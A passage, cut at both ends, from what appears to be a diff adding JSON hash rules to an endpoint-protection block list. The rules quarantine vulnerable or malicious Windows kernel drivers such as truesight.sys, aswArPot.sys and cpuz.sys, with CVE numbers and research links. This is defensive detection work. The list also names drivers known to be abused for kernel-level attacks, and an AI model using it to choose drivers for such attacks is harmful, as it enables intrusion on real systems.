+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156335Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b1af3c4cd93f51d6aa2e77729fc7b8f0246dbcd08a022906dfddbce7bd430aaa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74b56757-e00c-51c1-9e0c-e8426c467bce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970089Z",
+ "creation_date": "2026-03-23T11:45:29.970090Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970096Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9d736f624a306d6e2399778dd92ab7f4f7ab33c6ca0528657bc026214f990a4f",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74bc10aa-13ec-5d1e-8aee-7d7889e1efbf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820651Z",
+ "creation_date": "2026-03-23T11:45:30.820653Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820658Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6d2cc7e1d95bb752d79613d0ea287ea48a63fb643dcb88c12b516055da56a11d",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74cc68b9-6c07-52b2-a64c-d5b104702f95",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153042Z",
+ "creation_date": "2026-03-23T11:45:31.153045Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153053Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8eaac070c8aab78970a262f7f2f072c546587ad98aff0211c2ba2450a3011d91",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74cccde6-396b-5bae-9688-0c46891d793b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146546Z",
+ "creation_date": "2026-03-23T11:45:31.146549Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146554Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cc2817ba92143e5ce61d39b25e41cc2af61c405dc3201b6e25463e70b88b008f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74cda055-ac2b-5cb9-9583-57688716e410",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620370Z",
+ "creation_date": "2026-03-23T11:45:29.620371Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620377Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9a1d66036b0868bbb1b2823209fedea61a301d5dd245f8e7d390bd31e52d663e",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74d3557f-ba46-5358-9939-6bbbe91ee93e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968562Z",
+ "creation_date": "2026-03-23T11:45:29.968564Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968570Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ce81759bfa236913bbbb9b2cbc093140b099486fd002910b18e2c6e31fdc4f1",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74d68951-fee8-5771-a7fe-683a0ebceb53",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819490Z",
+ "creation_date": "2026-03-23T11:45:31.819493Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819501Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae69fe60af8e539c0448ff886b64a5b6cf4724118134d8e68fa1e038fd6bdf63",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74dad053-0838-5502-85f5-3fc0587f52c7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148572Z",
+ "creation_date": "2026-03-23T11:45:31.148574Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148580Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9e5f9cd77bc75592166179972748adbd5f5ba1cee16befcfa65ac688ad8a6799",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74db39c3-270a-5bc4-86e6-0ac39a8ec4e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827085Z",
+ "creation_date": "2026-03-23T11:45:31.827087Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827093Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cf433c0c2769fff006a0728b189c37683be8a77f7a981c9dce46c4eea6990e22",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74eaa6f0-9357-5613-9e8e-8605a687c639",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813426Z",
+ "creation_date": "2026-03-23T11:45:31.813428Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813436Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e85389084d4e3680d8183d94089ca54e8d706305b4fe0400737d200c74c6fa11",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "74f8f6d6-8796-5fdc-8ed5-b4d8c962f2ed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144884Z",
+ "creation_date": "2026-03-23T11:45:32.144886Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144892Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aa20aa2316cd6d203146bd2bc5b7466ba7b83a8500654a688172bcafa82ab168",
+ "comment": "Vulnerable Kernel Driver (aka tboflhelper.sys) [https://www.loldrivers.io/drivers/07c57c69-c8d7-40cf-8bcc-612671427044/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7500a648-c37e-5c74-8f90-3a6ddf2cb00e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834965Z",
+ "creation_date": "2026-03-23T11:45:30.834969Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834978Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f262595446d780dccdc21575dc7ea3cc4693a183526d5e31df12af553f5f3c76",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "750e8b21-baa9-52ce-a9aa-f655379a3f5f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968596Z",
+ "creation_date": "2026-03-23T11:45:29.968598Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968604Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3b6e85c8fed9e39b21b2eab0b69bc464272b2c92961510c36e2e2df7aa39861b",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "751b809c-2385-56d1-925c-b3447281af4a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144985Z",
+ "creation_date": "2026-03-23T11:45:32.144987Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144993Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4143a5bbea0d303c22d6edc6f43463e336eea9144218e02adad72133266130d2",
+ "comment": "Malicious Kernel Driver (aka driver_d1ea9e16.sys) [https://www.loldrivers.io/drivers/8697785a-d088-42a7-ac25-b5c8a3b22664/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "751f5975-5a61-54ae-a9be-b39784c83c55",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143467Z",
+ "creation_date": "2026-03-23T11:45:32.143469Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143474Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6278bc785113831b2ec3368e2c9c9e89e8aca49085a59d8d38dac651471d6440",
+ "comment": "Vulnerable Kernel Driver (aka wsdkd.sys) [https://www.loldrivers.io/drivers/a8f2da2a-369c-4b4d-9a00-d7a892b9f7c3/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "75303b7d-b6fe-5e28-bc87-951f180ee16e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617521Z",
+ "creation_date": "2026-03-23T11:45:29.617523Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617528Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2952ae305f9e206bb0b6d7986f2b6942656c310f9d201cf2e2dd6e961c18804e",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "75474ac6-f4ed-5ea2-a25f-db887733fc9b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472374Z",
+ "creation_date": "2026-03-23T11:45:30.472377Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472386Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d366cbc1d5dd8863b45776cfb982904abd21d0c0d4697851ff54381055abcfc8",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "75485e95-4fc0-5e5e-b29b-f58a4a1e65d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830429Z",
+ "creation_date": "2026-03-23T11:45:31.830431Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830436Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4d54f1068df426973293ef4a2600642f1bb355511a81fa7d69526dd6ca88f9c0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "754a2f56-6765-5bed-84d8-193cdd9e7f0c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148881Z",
+ "creation_date": "2026-03-23T11:45:31.148883Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148888Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eaffbe1b1d732fac8ea2fd78b6a9272d08c89c90d8be590a1128c20e4f34a010",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "754ac519-0359-5e43-876a-5ce0ba54375d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622140Z",
+ "creation_date": "2026-03-23T11:45:29.622142Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622147Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7ec93f34eb323823eb199fbf8d06219086d517d0e8f4b9e348d7afd41ec9fd5d",
+ "comment": "NamCo vulnerable driver (aka smep_namco.sys) [https://securelist.com/elevation-of-privileges-in-namco-driver/83707/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "755cb237-a350-5483-8d46-399d1e7fd91a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610124Z",
+ "creation_date": "2026-03-23T11:45:29.610126Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610131Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34bee22c18ddbddbe115cf1ab55cabf0e482aba1eb2c343153577fb24b7226d3",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "75733e07-93b7-5fb8-bad7-f9037248eb13",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618057Z",
+ "creation_date": "2026-03-23T11:45:29.618059Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618065Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4737750788c72d2fc9cf95681c622357263075d65b23e54c4dc3f31446cad37b",
